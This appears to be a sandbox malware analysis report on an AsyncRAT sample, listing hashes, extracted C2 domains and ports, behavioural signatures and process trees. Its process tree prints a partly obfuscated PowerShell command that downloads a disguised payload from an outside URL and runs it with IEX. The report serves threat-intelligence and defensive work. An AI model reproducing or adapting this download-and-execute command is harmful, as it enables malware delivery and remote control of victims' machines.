asyncrat | 2693749e9e3f7c99543e3e622a335a9db30dc604808f06e3a51f20c33bac8af2

General

Target

0eaee4c07ea1b88a8e5d044006b42d41.hta
Size

1KB
MD5

0eaee4c07ea1b88a8e5d044006b42d41
SHA1

62fe6a825728c186335fc2a24f24f0608519cdff
SHA256

2693749e9e3f7c99543e3e622a335a9db30dc604808f06e3a51f20c33bac8af2
SHA512

61ea582878866c4a5ac0cff1cfa4a8e59731396a25df430382bee11eedd4c0d942c81fc8c0d375027f45106e1dcff14910ce63e9a2c5b85451b0bd68e7a1311f

Score

10^/10

asyncrat #_avast_#rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://unimed-corporated.com/updata.jpg

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

#_AVAST_#

C2

cdtpitbull.hopto.org:7707

cdtpitbull.hopto.org:4404

cdtpitbull.hopto.org:5505

cdtpitbull.hopto.org:3303

cdtpitbull.hopto.org:2222

cdtpitbull.hopto.org:6606

cdtpitbull.hopto.org:8808

cdtpitbull.hopto.org:5155

cdtpitbull.hopto.org:5122

cdtpitbull.hopto.org:8001

cdtpitbull.hopto.org:9000

cdtpitbull.hopto.org:9999

cdtpitbull.hopto.org:8888

chromedata.accesscam.org:7707

chromedata.accesscam.org:4404

chromedata.accesscam.org:5505

chromedata.accesscam.org:3303

chromedata.accesscam.org:2222

chromedata.accesscam.org:6606

chromedata.accesscam.org:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_file
DesbravadorUpdata.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4384-143-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 3672 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3672 set thread context of 4384 3672 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exe

pid process

3672 powershell.exe
3672 powershell.exe
3672 powershell.exe
3672 powershell.exe
3672 powershell.exe
3672 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3672 powershell.exe

flow	pid	process
17	3672	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe

description	pid	process	target process
PID 3672 set thread context of 4384	3672	powershell.exe	aspnet_compiler.exe

pid	process
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3672	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

mshta.exepowershell.exe

description	pid	process	target process
PID 4220 wrote to memory of 3672	4220	mshta.exe	powershell.exe
PID 4220 wrote to memory of 3672	4220	mshta.exe	powershell.exe
PID 4220 wrote to memory of 3672	4220	mshta.exe	powershell.exe
PID 3672 wrote to memory of 4608	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4608	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4608	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4500	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4500	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4500	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe
PID 3672 wrote to memory of 4384	3672	powershell.exe	aspnet_compiler.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0eaee4c07ea1b88a8e5d044006b42d41.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://un').Replace('################','imed-corporated.com/updata.jpg'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4608

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4500

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4384

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3672-136-0x0000000005E20000-0x0000000005E3E000-memory.dmp

Filesize
120KB

Download
memory/3672-130-0x0000000000000000-mapping.dmp

Download
memory/3672-132-0x0000000004F30000-0x0000000005558000-memory.dmp

Filesize
6.2MB

Download
memory/3672-133-0x0000000005590000-0x00000000055B2000-memory.dmp

Filesize
136KB

Download
memory/3672-134-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/3672-135-0x00000000057D0000-0x0000000005836000-memory.dmp

Filesize
408KB

Download
memory/3672-131-0x00000000048C0000-0x00000000048F6000-memory.dmp

Filesize
216KB

Download
memory/3672-137-0x0000000006E80000-0x0000000006F1C000-memory.dmp

Filesize
624KB

Download
memory/3672-138-0x0000000007950000-0x0000000007FCA000-memory.dmp

Filesize
6.5MB

Download
memory/3672-139-0x0000000006E40000-0x0000000006E5A000-memory.dmp

Filesize
104KB

Download
memory/4384-142-0x0000000000000000-mapping.dmp

Download
memory/4384-143-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4500-141-0x0000000000000000-mapping.dmp

Download
memory/4608-140-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads